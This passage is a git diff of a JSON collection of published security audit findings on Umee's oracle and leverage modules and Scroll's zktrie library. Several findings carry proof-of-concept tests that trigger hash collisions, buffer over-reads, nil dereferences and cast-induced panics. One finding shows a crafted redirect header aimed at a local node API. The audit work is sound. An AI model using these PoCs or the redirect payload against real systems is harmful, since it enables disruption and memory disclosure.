As a result, the VWAP value computed by the price-feeder and committed on-chain is much higher than it should be. Moreover, because most validators have committed the wrong price, the average computed on-chain is also wrong. The attacker then draws funds from the system. Recommendations Short term, implement a price-feeder mechanism for detecting the submission of wildly incorrect prices by a third-party provider. Have the system temporarily disable the use of the malfunctioning provider(s) and issue an alert calling for an investigation. If it is not possible to automatically identify the malfunctioning provider(s), stop committing prices. (Note, though, that this may result in a loss of interest for validators.) Consider implementing a similar mechanism in the x/oracle module so that it can identify when the exchange rates committed by validators are too similar to one another or to old values. References Synthetix Response to Oracle Incident", + "title": "16. Safe-Rust ZkMemoryDb interface is not thread-safe ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The Go function Database.Init, shown in figure 16.1, is not thread-safe. In particular, if it is called from multiple threads, a data race may occur when writing to the map. In normal usage, that is not a problem; any user of the Database.Init function is expected to run the function only during initialization, when synchronization is not required. // Init flush db with batches of k/v without locking func (db *Database) Init(k, v []byte) { db.db[string(k)] = v } Figure 16.1: trie/zk_trie_database.go#40-43 However, this function is called by the safe Rust function ZkMemoryDb::add_node_bytes (figure 16.2) via the cgo function InitDbByNode (figure 16.3): pub fn add_node_bytes(&mut self, data: &[u8]) -> Result<(), ErrString> { let ret_ptr = unsafe { InitDbByNode(self.db, data.as_ptr(), data.len() as c_int) }; if ret_ptr.is_null() { Ok(()) } else { Err(ret_ptr.into()) } } Figure 16.2: src/lib.rs#171-178 // flush db with encoded trie-node bytes //export InitDbByNode func InitDbByNode(pDb C.uintptr_t, data *C.uchar, sz C.int) *C.char { h := cgo.Handle(pDb) db := h.Value().(*trie.Database) bt := C.GoBytes(unsafe.Pointer(data), sz) n, err := trie.DecodeSMTProof(bt) if err != nil { return C.CString(err.Error()) } else if n == nil { //skip magic string return nil } hash, err := n.NodeHash() if err != nil { return C.CString(err.Error()) } db.Init(hash[:], n.CanonicalValue()) return nil } Figure 16.3: lib.go#147-170 Safe Rust is required to never invoke undefined behavior, such as data races. When wrapping unsafe Rust code, including FFI calls, care must be taken to ensure that safe Rust code cannot invoke undefined behavior through that wrapper. (Refer to the How Safe and Unsafe Interact section of the Rustonomicon.) Although add_node_bytes takes &mut self, and thus cannot be called from more than one thread at once, a second reference to the database can be created in a way that Rust's borrow checker cannot track, by calling new_trie. Figures 16.4, 16.5, and 16.6 show the call trace by which a pointer to the Database is stored in the ZkTrieImpl.
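// Figure 16.4 below: new_trie hands the same database handle (self.db) to the
// Go side, so the returned ZkTrie keeps a second reference to the Database
// that Rust's borrow checker cannot see.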
pub fn new_trie(&mut self, root: &Hash) -> Option<ZkTrie> { let ret = unsafe { NewZkTrie(root.as_ptr(), self.db) }; if ret.is_null() { None } else { Some(ZkTrie { trie: ret }) } } Figure 16.4: src/lib.rs#181-189 func NewZkTrie(root_c *C.uchar, pDb C.uintptr_t) C.uintptr_t { h := cgo.Handle(pDb) db := h.Value().(*trie.Database) root := C.GoBytes(unsafe.Pointer(root_c), 32) zktrie, err := trie.NewZkTrie(*zkt.NewByte32FromBytes(root), db) if err != nil { return 0 } return C.uintptr_t(cgo.NewHandle(zktrie)) } Figure 16.5: lib.go#174-185 func NewZkTrieImpl(storage ZktrieDatabase, maxLevels int) (*ZkTrieImpl, error) { return NewZkTrieImplWithRoot(storage, &zkt.HashZero, maxLevels) } // NewZkTrieImplWithRoot loads a new ZkTrieImpl. If in the storage already exists one // will open that one, if not, will create a new one. func NewZkTrieImplWithRoot(storage ZktrieDatabase, root *zkt.Hash, maxLevels int) (*ZkTrieImpl, error) { mt := ZkTrieImpl{db: storage, maxLevels: maxLevels, writable: true} mt.rootHash = root if *root != zkt.HashZero { _, err := mt.GetNode(mt.rootHash) if err != nil { return nil, err } } return &mt, nil } Figure 16.6: trie/zk_trie_impl.go#56-72 Then, by calling add_node_bytes in one thread and ZkTrie::root() or some other method that calls Database.Get(), one can trigger a data race from safe Rust. Exploit Scenario A Rust-based library consumer uses threads to improve performance. Relying on Rust's type system, they assume that thread safety has been enforced and they run ZkMemoryDb::add_node_bytes in a multi-threaded scenario. A data race occurs and the system crashes. Recommendations Short term, add synchronization to Database.Init, such as by calling db.lock.Lock(). Long term, carefully review all interactions between C and Rust, paying special attention to guidance in the How Safe and Unsafe Interact section of the Rustonomicon.", "labels": [ "Trail of Bits", "Severity: High", @@ -3502,159 +6200,159 @@ ] }, { - "title": "9. Oracle rewards may not be distributed ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "If the x/oracle module lacks the coins to cover a reward payout, the rewards will not be distributed or registered for payment in the future. var periodRewards sdk.DecCoins for _, denom := range rewardDenoms { rewardPool := k.GetRewardPool(ctx, denom) // return if there's no rewards to give out if rewardPool.IsZero() { continue } periodRewards = periodRewards.Add(sdk.NewDecCoinFromDec( denom, sdk.NewDecFromInt(rewardPool.Amount).Mul(distributionRatio), )) } Figure 9.1: A loop in the code that calculates oracle rewards ( umee/x/oracle/keeper/reward.go#4356 ) Recommendations Short term, document the fact that oracle rewards will not be distributed when the x/oracle module does not have enough coins to cover the rewards.", + "title": "17. Some Node functions return the zero hash instead of errors ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The Node.NodeHash and Node.ValueHash methods each return the zero hash in cases in which an error return would be more appropriate. In the case of NodeHash, all invalid node types return the zero hash, the same hash as an empty node (shown in figure 17.1). case NodeTypeEmpty: // Zero n.nodeHash = &zkt.HashZero default: n.nodeHash = &zkt.HashZero } } return n.nodeHash, nil Figure 17.1: trie/zk_trie_node.go#149-155 In the case of ValueHash, non-leaf nodes have a zero value hash, as shown in figure 17.2.
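// Figure 17.2 below: for any non-leaf node, ValueHash reports the zero hash
// with a nil error, so a caller cannot distinguish it from a genuine value hash.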
func (n *Node) ValueHash() (*zkt.Hash, error) { if n.Type != NodeTypeLeaf { return &zkt.HashZero, nil } Figure 17.2: trie/zk_trie_node.go#160-163 In both of these cases, returning an error is more appropriate and prevents potential confusion if client software assumes that the main return value is valid whenever the error returned is nil. Recommendations Short term, have the functions return an error in these cases instead of the zero hash. Long term, ensure that exceptional cases lead to non-nil error returns rather than default values.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: N/A" ] }, { - "title": "10. Risk of server-side request forgery attacks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The price-feeder sends HTTP requests to congured providers APIs. If any of the HTTP responses is a redirect response (e.g., one with HTTP response code 301), the module will automatically issue a new request to the address provided in the responses header. The new address may point to a local address, potentially one that provides access to restricted services. Exploit Scenario An attacker gains control over the Osmosis API. He changes the endpoint used by the price-feeder such that it responds with a redirect like that shown in gure 10.1, with the goal of removing a transaction from a Tendermint validators mempool. The price-feeder automatically issues a new request to the Tendermint REST API. Because the API does not require authentication and is running on the same machine as the price-feeder , the request is successful, and the target transaction is removed from the validator's mempool. HTTP/1.1 301 Moved Permanently Location: http://localhost:26657/remove_tx?txKey=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Figure 10.1: The redirect response Recommendations Short term, use a function such as CheckRedirect to disable redirects, or at least redirects to local services, in all HTTP clients.", + "title": "4. BuildZkTrieProof does not populate NodeAux.Value ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "A nonexistence proof for some key k in a Merkle tree is a Merkle path from the root of the tree to a subtree, which would contain k if it were present but which instead is either an empty subtree or a subtree with a single leaf k2 where k != k2. In the zktrie codebase, that second case is handled by the NodeAux field in the Proof struct, as illustrated in figure 4.1. 
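// Figure 4.1 below: in the nonexistence branch, Verify hashes proof.NodeAux.Key
// and proof.NodeAux.Value; a NodeAux.Value left nil by the prover is
// dereferenced inside LeafHash and crashes verification.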
// Verify the proof and calculate the root, nodeHash can be nil when try to verify // a nonexistent proof func (proof *Proof) Verify(nodeHash, nodeKey *zkt.Hash) (*zkt.Hash, error) { if proof.Existence { if nodeHash == nil { return nil, ErrKeyNotFound } return proof.rootFromProof(nodeHash, nodeKey) } else { if proof.NodeAux == nil { return proof.rootFromProof(&zkt.HashZero, nodeKey) } else { if bytes.Equal(nodeKey[:], proof.NodeAux.Key[:]) { return nil, fmt.Errorf(\"non-existence proof being checked against hIndex equal to nodeAux\") } midHash, err := LeafHash(proof.NodeAux.Key, proof.NodeAux.Value) if err != nil { return nil, err } return proof.rootFromProof(midHash, nodeKey) } } } Figure 4.1: The Proof.Verify method (zktrie/trie/zk_trie_impl.go#609-632) When a non-inclusion proof is generated, the BuildZkTrieProof function looks up the other leaf node and uses its NodeKey and valueHash fields to populate the Key and Value fields of NodeAux, as shown in figure 4.2. However, the valueHash field of this node may be nil, causing NodeAux.Value to be nil and causing proof verification to crash with a nil pointer dereference error, which can be triggered by the test case shown in figure 4.3. n, err := getNode(nextHash) if err != nil { return nil, nil, err } switch n.Type { case NodeTypeEmpty: return p, n, nil case NodeTypeLeaf: if bytes.Equal(kHash[:], n.NodeKey[:]) { p.Existence = true return p, n, nil } // We found a leaf whose entry didn't match hIndex p.NodeAux = &NodeAux{Key: n.NodeKey, Value: n.valueHash} return p, n, nil Figure 4.2: Populating NodeAux (zktrie/trie/zk_trie_impl.go#560-574) func TestMerkleTree_GetNonIncProof(t *testing.T) { zkTrie := newTestingMerkle(t, 10) t.Run(\"Testing for non-inclusion proofs\", func(t *testing.T) { k := zkt.Byte32{1} k_value := (&[1]zkt.Byte32{{1}})[:] k_other := zkt.Byte32{2} k_hash_int, _ := k.Hash() k_other_hash_int, _ := k_other.Hash() k_hash := zkt.NewHashFromBigInt(k_hash_int) k_other_hash := zkt.NewHashFromBigInt(k_other_hash_int) assert.Nil(t, zkTrie.TryUpdate(k_hash, 0, k_value)) getNode := func(hash *zkt.Hash) (*Node, error) { return zkTrie.GetNode(hash) } proof, _, err := BuildZkTrieProof(zkTrie.rootHash, k_other_hash_int, 10, getNode) assert.Nil(t, err) assert.False(t, proof.Existence) proof_root, _ := proof.Verify(nil, k_other_hash) assert.Equal(t, proof_root, zkTrie.rootHash) }) } Figure 4.3: A test case that will crash with a nil dereference of NodeAux.Value Adding a call to n.NodeHash() inside BuildZkTrieProof, as shown in figure 4.4, fixes this problem. n, err := getNode(nextHash) if err != nil { return nil, nil, err } switch n.Type { case NodeTypeEmpty: return p, n, nil case NodeTypeLeaf: if bytes.Equal(kHash[:], n.NodeKey[:]) { p.Existence = true return p, n, nil } // We found a leaf whose entry didn't match hIndex n.NodeHash() p.NodeAux = &NodeAux{Key: n.NodeKey, Value: n.valueHash} return p, n, nil Figure 4.4: Adding the highlighted n.NodeHash() call fixes this problem. (zktrie/trie/zk_trie_impl.go#560-574) Exploit Scenario An adversary or ordinary user requests that the software generate and verify a non-inclusion proof, and the software crashes, leading to the loss of service. Recommendations Short term, fix BuildZkTrieProof by adding a call to n.NodeHash(), as described above. Long term, ensure that all major code paths in important functions, such as proof generation and verification, are tested.
The Go coverage analysis report generated by the command go test -cover -coverprofile c.out && go tool cover -html=c.out shows that this branch in Proof.Verify is not currently tested: Figure 4.5: The Go coverage analysis report", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: Low", + "Difficulty: Low" ] }, { - "title": "11. Incorrect comparison in SetCollateralSetting method ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "Umee users can send a SetCollateral message to disable the use of a certain asset as collateral. The messages are handled by the SetCollateralSetting method (gure 11.1), which should ensure that the borrow limit will not drop below the amount borrowed. However, the function uses an incorrect comparison, checking that the borrow limit will be greater than, not less than, that amount. // Return error if borrow limit would drop below borrowed value if newBorrowLimit.GT(borrowedValue) { return sdkerrors.Wrap(types.ErrBorrowLimitLow, newBorrowLimit.String()) } Figure 11.1: The incorrect comparison in the SetCollateralSetting method ( umee/x/leverage/keeper/keeper.go#343346 ) Exploit Scenario An attacker provides collateral to the Umee system and borrows some coins. Then the attacker disables the use of the collateral asset; because of the incorrect comparison in the SetCollateralSetting method, the disable operation succeeds, and the collateral is sent back to the attacker. Recommendations Short term, correct the comparison in the SetCollateralSetting method. Long term, implement tests to check whether basic functionality works as expected.", + "title": "5. Leaf nodes with different values may have the same hash ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The hash value of a leaf node is derived from the hash of its key and its value. A leaf node's value comprises up to 256 32-byte fields, and that value's hash is computed by passing those fields to the HashElems function. HashElems hashes these fields in a Merkle tree-style binary tree pattern, as shown in figure 5.1. func HashElems(fst, snd *big.Int, elems ...*big.Int) (*Hash, error) { l := len(elems) baseH, err := hashScheme([]*big.Int{fst, snd}) if err != nil { return nil, err } if l == 0 { return NewHashFromBigInt(baseH), nil } else if l == 1 { return HashElems(baseH, elems[0]) } tmp := make([]*big.Int, (l+1)/2) for i := range tmp { if (i+1)*2 > l { tmp[i] = elems[i*2] } else { h, err := hashScheme(elems[i*2 : (i+1)*2]) if err != nil { return nil, err } tmp[i] = h } } return HashElems(baseH, tmp[0], tmp[1:]...) } Figure 5.1: Binary-tree hashing in HashElems (zktrie/types/util.go#9-36) However, HashElems does not include the number of elements being hashed, so leaf nodes with different values may have the same hash, as illustrated in the proof-of-concept test case shown in figure 5.2. 
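// Figure 5.2 below: value2's first field is the hash of value1's first two
// fields, so HashElems folds both preimages to the same digest even though
// the values differ.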
func TestMerkleTree_MultiValue(t *testing.T) { t.Run(\"Testing for value collisions\", func(t *testing.T) { k := zkt.Byte32{1} k_hash_int, _ := k.Hash() k_hash := zkt.NewHashFromBigInt(k_hash_int) value1 := (&[3]zkt.Byte32{{1}, {2}, {3}})[:] value1_hash, _ := NewLeafNode(k_hash, 0, value1).NodeHash() first2_hash, _ := zkt.PreHandlingElems(0, value1[:2]) value2 := (&[2]zkt.Byte32{*zkt.NewByte32FromBytes(first2_hash.Bytes()), {3}})[:] value2_hash, _ := NewLeafNode(k_hash, 0, value2).NodeHash() assert.NotEqual(t, value1, value2) assert.Equal(t, value1_hash, value2_hash) }) } Figure 5.2: A proof-of-concept test case for value collisions Exploit Scenario An adversary inserts a maliciously crafted value into the tree and then creates a proof for a different, colliding value. This violates the security requirements of a Merkle tree and may lead to incorrect behavior such as state divergence. Recommendations Short term, modify PreHandlingElems to prefix the ValuePreimage array with its length before it is passed to HashElems. Long term, document and review all uses of hash functions to ensure that they commit to their inputs.", "labels": [ "Trail of Bits", "Severity: High", - "Difficulty: Low" + "Difficulty: Medium" ] }, { - "title": "12. Voters ability to overwrite their own pre-votes is not documented ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The x/oracle module allows voters to submit more than one pre-vote message during the same pre-voting period, overwriting their previous pre-vote messages (gure 12.1). This feature is not documented; while it does not constitute a direct security risk, it may be unintended behavior. Third parties may incorrectly assume that validators cannot change their pre-vote messages. Monitoring systems may detect only the rst pre-vote event for a validators pre-vote messages, while voters may trust the exchange rates and salts revealed by other voters to be nal. On the other hand, this feature may be an intentional one meant to allow voters to update the exchange rates they submit as they obtain more accurate pricing information. func (ms msgServer) AggregateExchangeRatePrevote( goCtx context.Context, msg *types.MsgAggregateExchangeRatePrevote, ) (*types.MsgAggregateExchangeRatePrevoteResponse, error ) { // (...) aggregatePrevote := types.NewAggregateExchangeRatePrevote(voteHash, valAddr, uint64 (ctx.BlockHeight())) // This call overwrites previous pre-vote if there was one ms.SetAggregateExchangeRatePrevote(ctx, valAddr, aggregatePrevote) ctx.EventManager().EmitEvents(sdk.Events{ // (...) - emit EventTypeAggregatePrevote and EventTypeMessage }) return &types.MsgAggregateExchangeRatePrevoteResponse{}, nil } Figure 12.1: umee/x/oracle/keeper/msg_server.go#L23-L66 Recommendations Short term, document the fact that a pre-vote message can be submitted and overwritten in the same voting period. Alternatively, disallow this behavior by having the AggregateExchangeRatePrevote function return an error if a validator attempts to submit an additional exchange rate pre-vote message. Long term, add tests to check for this behavior.", + "title": "17. Some Node functions return the zero hash instead of errors ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The Node.NodeHash and Node.ValueHash methods each return the zero hash in cases in which an error return would be more appropriate. 
In the case of NodeHash, all invalid node types return the zero hash, the same hash as an empty node (shown in figure 17.1). case NodeTypeEmpty: // Zero n.nodeHash = &zkt.HashZero default: n.nodeHash = &zkt.HashZero } } return n.nodeHash, nil Figure 17.1: trie/zk_trie_node.go#149-155 In the case of ValueHash, non-leaf nodes have a zero value hash, as shown in figure 17.2. func (n *Node) ValueHash() (*zkt.Hash, error) { if n.Type != NodeTypeLeaf { return &zkt.HashZero, nil } Figure 17.2: trie/zk_trie_node.go#160-163 In both of these cases, returning an error is more appropriate and prevents potential confusion if client software assumes that the main return value is valid whenever the error returned is nil. Recommendations Short term, have the functions return an error in these cases instead of the zero hash. Long term, ensure that exceptional cases lead to non-nil error returns rather than default values.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: N/A" ] }, { - "title": "13. Lack of user-controlled limits for input amount in LiquidateBorrow ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The x/leverage modules LiquidateBorrow function computes the amount of funds that will be transferred from the module to the functions caller in a liquidation. The computation uses asset prices retrieved from an oracle. There is no guarantee that the amount returned by the module will correspond to the current market price, as a transaction that updates the price feed could be mined before the call to LiquidateBorrow . Adding a lower limit to the amount sent by the module would enable the caller to explicitly state his or her assumptions about the liquidation and to ensure that the collateral payout is as protable as expected. It would also provide additional protection against the misreporting of oracle prices. Since such a scenario is unlikely, we set the diculty level of this nding to high. Using caller-controlled limits for the amount of a transfer is a best practice commonly employed by large DeFi protocols such as Uniswap. Exploit Scenario Alice calls the LiquidateBorrow function. Due to an oracle malfunction, the amount of collateral transferred from the module is much lower than the amount she would receive on another market. Recommendations Short term, introduce a minRewardAmount parameter and add a check verifying that the reward value is greater than or equal to the minRewardAmount value. Long term, always allow the caller to control the amount of a transfer. This is especially important for transfer amounts that depend on factors that can change between transactions. Enable the caller to add a lower limit for a transfer from a module and an upper limit for a transfer of the callers funds to a module.", + "title": "18. get_account can read past the buffer ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The public get_account function assumes that the provided key corresponds to an account key. However, if the function is instead called with a storage key, it will cause an out-of-bounds read that could leak secret information. In the Rust implementation, leaf nodes can have two types of values: accounts and storage. Account values have a size of either 128 or 160 bytes depending on whether they include one or two code hashes. On the other hand, storage values always have a size of 32 bytes. 
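Because these sizes are fixed, the Go side could reject a storage value before the bytes ever reach the account path; the following minimal Go sketch (hypothetical names, not the library's API) illustrates the kind of length check that the short-term recommendation below has in mind:

package main

import (
	"errors"
	"fmt"
)

const fieldSize = 32 // every trie value field is 32 bytes

// errNotAccount signals that a retrieved value cannot be an account:
// accounts are 4 or 5 fields (128 or 160 bytes); storage values are 1 field.
var errNotAccount = errors.New("value at key is not an account")

// checkAccountValue is a hypothetical guard that accepts only byte slices
// whose length matches an account value, so a 32-byte storage value is
// rejected with an error instead of being over-read.
func checkAccountValue(v []byte) ([]byte, error) {
	if len(v) != 4*fieldSize && len(v) != 5*fieldSize {
		return nil, fmt.Errorf("%w (len=%d)", errNotAccount, len(v))
	}
	return v, nil
}

func main() {
	storage := make([]byte, fieldSize) // a storage value, not an account
	if _, err := checkAccountValue(storage); err != nil {
		fmt.Println(err) // value at key is not an account (len=32)
	}
}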
The get_account function takes a key and returns the account associated with it. In practice, it computes the value pointer associated with the key and reads 128 or 160 bytes at that address. If the key contains a storage value rather than an account value, then get_account reads 96 or 128 bytes past the buffer. This is shown in figure 18.4. // get account data from account trie pub fn get_account(&self, key: &[u8]) -> Option<AccountData> { self.get::<ACCOUNTSIZE>(key).map(|arr| unsafe { std::mem::transmute::<[u8; FIELDSIZE * ACCOUNTFIELDS], AccountData>(arr) }) } Figure 18.1: get_account calls get with type ACCOUNTSIZE and key. (zktrie/src/lib.rs#230-235) // all errors are reduced to \"not found\" fn get<const T: usize>(&self, key: &[u8]) -> Option<[u8; T]> { let ret = unsafe { TrieGet(self.trie, key.as_ptr(), key.len() as c_int) }; if ret.is_null() { None } else { Some(must_get_const_bytes::<T>(ret)) } } Figure 18.2: get calls must_get_const_bytes with type ACCOUNTSIZE and the pointer returned by TrieGet. (zktrie/src/lib.rs#214-223) fn must_get_const_bytes<const T: usize>(p: *const u8) -> [u8; T] { let bytes = unsafe { std::slice::from_raw_parts(p, T) }; let bytes = bytes .try_into() .expect(\"the buf has been set to specified bytes\"); unsafe { FreeBuffer(p.cast()) } bytes } Figure 18.3: must_get_const_bytes calls std::slice::from_raw_parts with type ACCOUNTSIZE and pointer p to read ACCOUNTSIZE bytes from pointer p. (zktrie/src/lib.rs#100-107) #[test] fn get_account_overflow() { let storage_key = hex::decode(\"0000000000000000000000000000000000000000000000000000000000000000\") .unwrap(); let storage_data = [10u8; 32]; init_hash_scheme(hash_scheme); let mut db = ZkMemoryDb::new(); let root_hash = Hash::from([0u8; 32]); let mut trie = db.new_trie(&root_hash).unwrap(); trie.update_store(&storage_key, &storage_data).unwrap(); println!(\"{:?}\", trie.get_account(&storage_key).unwrap()); } // Sample output (picked from a sample of ten runs): // [[10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10], [160, 113, 63, 0, 2, 0, 0, 0, 161, 67, 240, 40, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 24, 158, 63, 0, 2, 0, 0, 0, 17, 72, 240, 40, 1, 0, 0, 0], [16, 180, 85, 254, 1, 0, 0, 0, 216, 179, 85, 254, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]] Figure 18.4: This is a proof-of-concept demonstrating the buffer over-read. When run with cargo test get_account_overflow -- --nocapture, it prints 128 bytes with the last 96 bytes being over-read. Exploit Scenario Suppose the Rust program leaves secret data in memory. An attacker can interact with the zkTrie to read secret data out-of-bounds. Recommendations Short term, have get_account return an error when it is called on a key containing a storage value. Additionally, this logic should be moved to the Go implementation instead of residing in the Rust bindings. Long term, review all unsafe code, especially code related to pointer manipulation, to prevent similar issues.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: High", + "Difficulty: Medium" ] }, { - "title": "14. Lack of simulation and fuzzing of leverage module invariants ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The Umee system lacks comprehensive Cosmos SDK simulations and invariants for its x/oracle and x/leverage modules. 
More thorough use of the simulation feature would facilitate fuzz testing of the entire blockchain and help ensure that the invariants hold. Additionally, the current simulation module may need to be modied for the following reasons: It exits on the rst transaction error . To avoid an early exit, it could skip transactions that are expected to fail when they are generated; however, that could also cause it to skip logic that contains issues. The numKeys argument , which determines how many accounts it will use, can range from 2 to 2,500. Using too many accounts may hinder the detection of bugs that require multiple transactions to be executed by a few accounts. By default, it is congured to use a \"stake\" currency , which may not be used in the nal Umee system. Running it with a small number of accounts and a large block size for many blocks could quickly cause all validators to be unbonded. To avoid this issue, the simulation would need the ability to run for a longer time. attempted to use the simulation module by modifying the recent changes to the Umee codebase, which introduce simulations for the x/oracle and x/leverage modules (commit f22b2c7f8e ). We enabled the x/leverage module simulation and modied the Cosmos SDK codebase locally so that the framework would use fewer accounts and log errors via Fatalf logs instead of exiting. The framework helped us nd the issue described in TOB-UMEE-15 , but the setup and tests we implemented were not exhaustive. We sent the codebase changes we made to the Umee team via an internal chat. Recommendations Short term, identify, document, and test all invariants that are important for the systems security, and identify and document the arbitrage opportunities created by the system. Enable simulation of the x/oracle and x/leverage modules and ensure that the following assertions and invariants are checked during simulation runs: 1. In the UpdateExchangeRates function , the token supply value corresponds to the uToken supply value. Implement the following check: if uTokenSupply != 0 { assert(tokenSupply != 0) } 2. In the LiquidateBorrow function (after the line if !repayment.Amount.IsPositive() ) , the following comparisons evaluate to true: ExchangeUToken(reward) == EquivalentTokenValue(repayment, baseRewardDenom) TokenValue(ExchangeUToken(ctx, reward)) == TokenValue(repayment) borrowed.AmountOf(repayment.Denom) >= repayment.Amount collateral.AmountOf(rewardDenom) >= reward.Amount module's collateral amount >= reward.Amount repayment <= desiredRepayment 3. The x/leverage module is never signicantly undercollateralized at the end of a transaction. Implement a check, total collateral value * X >= total borrows value , in which X is close to 1. (It may make sense for the value of X to be greater than or equal to 1 to account for module reserves.) It may be acceptable for the module to be slightly undercollateralized, as it may mean that some liquidations have yet to be executed. 4. The amount of reserves remains above a certain minimum value, or new loans cannot be issued if the amount of reserves drops below a certain value. 5. The interest on a loan is less than or equal to the borrowing fee. (This invariant is related to the issue described in TOB-UMEE-23 .) 6. 7. 8. It is impossible to borrow funds without paying a fee. Currently, when four messages (lend, borrow, repay, and withdraw messages) are sent in one transaction, the EndBlocker method will not collect borrowing fees. 
Token/uToken exchange rates are always greater than or equal to 1 and are less than an expected maximum. To avoid rapid signicant price increases and decreases, ensure that the rates do not change more quickly than expected. The exchangeRate value cannot be changed by public (user-callable) methods like LendAsset and WithdrawAsset . Pay special attention to rounding errors and make sure that the module is the beneciary of all rounding operations. 9. It is impossible to liquidate more than the closeFactor in a single liquidation transaction for a defaulted loan; be mindful of the fact that a single transaction can include more than one message. Long term, e xtend the simulation module to cover all operations that may occur in a real Umee deployment, along with all potential error states, and run it many times before each release. Ensure the following: All modules and operations are included in the simulation module. The simulation uses a small number of accounts (e.g., between 5 and 20) to increase the likelihood of an interesting state change. The simulation uses the currencies/tokens that will be used in the production network. Oracle price changes are properly simulated. (In addition to a mode in which prices are changed randomly, implement a mode in which prices are changed only slightly, a mode in which prices are highly volatile, and a mode in which prices decrease or increase continuously for a long time period.) The simulation continues running when a transaction triggers an error. All transaction code paths are executed. (Enable code coverage to see how often individual lines are executed.)", + "title": "19. Unchecked usize to c_int casts allow hash collisions by length misinterpretation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "A set of unchecked integer casting operations can lead to hash collisions and runtime errors reached from the public Rust interface. The Rust library regularly needs to convert an input function's byte array length from the usize type to the c_int type. Depending on the architecture, these types might differ in size and signedness. This difference allows an attacker to provide an array with a maliciously chosen length that will be cast to a different number. The attacker can manipulate the array so that its length is cast to a value smaller than the actual array length, allowing the attacker to create two leaf nodes from different byte arrays that result in the same hash. The attacker is also able to cast the value to a negative number, causing a runtime error when the Go library calls the GoBytes function. The issue is caused by the explicit and unchecked cast using the as operator and occurs in the ZkTrieNode::parse, ZkMemoryDb::add_node_bytes, ZkTrie::get, ZkTrie::prove, ZkTrie::update, and ZkTrie::delete functions (all of which are public). Figure 19.1 shows ZkTrieNode::parse: impl ZkTrieNode { pub fn parse(data: &[u8]) -> Self { Self { trie_node: unsafe { NewTrieNode(data.as_ptr(), data.len() as c_int) }, } } Figure 19.1: zktrie/src/lib.rs#133-138 To achieve a collision for nodes constructed from different byte arrays, first observe that (c_int::MAX as usize) * 2 + 2 is 0 when cast to c_int. Thus, creating two nodes that share the same prefix and are then padded with different bytes of that length will cause the Go library to interpret only the common prefix of these nodes. The following test showcases this exploit. 
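// Figure 19.2 below: (c_int::MAX as usize) * 2 + 2 equals 2^32, which wraps
// to 0 as a 32-bit c_int, so the Go side parses only the shared prefix of
// each differently padded buffer.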
#[test] fn invalid_cast() { init_hash_scheme(hash_scheme); // common prefix let nd = &hex::decode(\"012098f5fb9e239eab3ceac3f27b81e481dc3124d55ffed523a839ee8446b64864010100000000000000000000000000000000000000000000000000000000018282256f8b00\").unwrap(); // create node1 with prefix padded by zeroes let mut vec_nd = nd.to_vec(); let mut zero_padd_data = vec![0u8; (c_int::MAX as usize) * 2 + 2]; vec_nd.append(&mut zero_padd_data); let node1 = ZkTrieNode::parse(&vec_nd); // create node2 with prefix padded by ones let mut vec_nd = nd.to_vec(); let mut one_padd_data = vec![1u8; (c_int::MAX as usize) * 2 + 2]; vec_nd.append(&mut one_padd_data); let node2 = ZkTrieNode::parse(&vec_nd); // create node3 with just the prefix let node3 = ZkTrieNode::parse(&hex::decode(\"012098f5fb9e239eab3ceac3f27b81e481dc3124d55ffed523a839ee8446b64864010100000000000000000000000000000000000000000000000000000000018282256f8b00\").unwrap()); // all hashes are equal assert_eq!(node1.node_hash(), node2.node_hash()); assert_eq!(node1.node_hash(), node3.node_hash()); } Figure 19.2: A test showing three different leaf nodes with colliding hashes This finding also allows an attacker to cause a runtime error by choosing a data array with a length that causes the cast to result in a negative number. Figure 19.3 shows a test that triggers the runtime error for the parse function: #[test] fn invalid_cast() { init_hash_scheme(hash_scheme); let data = vec![0u8; c_int::MAX as usize + 1]; println!(\"{:?}\", data.len() as c_int); let _nd = ZkTrieNode::parse(&data); } // running 1 test // -2147483648 // panic: runtime error: gobytes: length out of range // goroutine 17 [running, locked to thread]: _cgo_gotypes.go:102 // main._Cfunc_GoBytes(...) // // main.NewTrieNode.func1(0x14000062de8?, 0x80000000) // /zktrie/lib.go:78 +0x50 // main.NewTrieNode(0x14000062e01?, 0x2680?) /zktrie/lib.go:78 +0x1c // Figure 19.3: A test that triggers the issue, whose output shows the reinterpreted length of the array Exploit Scenario An attacker provides two different byte arrays that will have the same node_hash, breaking the assumption that such nodes are hard to obtain. Recommendations Short term, have the code perform the cast in a checked manner by using the c_int::try_from method to validate that the conversion succeeds. 